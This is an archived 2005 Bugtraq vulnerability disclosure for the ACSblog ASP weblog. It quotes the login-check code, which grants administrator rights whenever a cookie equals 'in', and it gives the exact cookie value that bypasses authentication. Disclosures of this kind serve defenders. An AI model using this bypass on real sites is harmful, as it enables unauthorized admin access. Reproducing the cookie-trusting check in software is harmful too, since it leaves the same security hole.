| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050423171021.17464.qmail@www.securityfocus.com> Date: 23 Apr 2005 17:10:21 -0000 From: farhad koosha <farhadkey@...oo.com> To: bugtraq@...urityfocus.com Subject: ACSblog bug */ WWW.BAHADORLOVER.COM \* ACSblog : A asp weblog with manageable code blocks and logical structure make it easy for the novice to get into the code and customize it to your site. Full-featured enough for expert bloggers vendor:www.asppress.com Where is the bug ? inc_login_check.asp <% if request.cookies(cookiename)="in" then ihaveadminright=true else ihaveadminright=false end if %> --------------- Default cookiename is "ACSBlog12345" and you can create a cookie or using http headers -> ACSBlog12345=in --------------- vulnerable versions: 0.8 1.0 1.0.1 1.0.2 1.0.3 1.1 1.1.2 1.1.3 Commercial Version 3NITRO : www.bahadorlover.com
Powered by blists - more mailing lists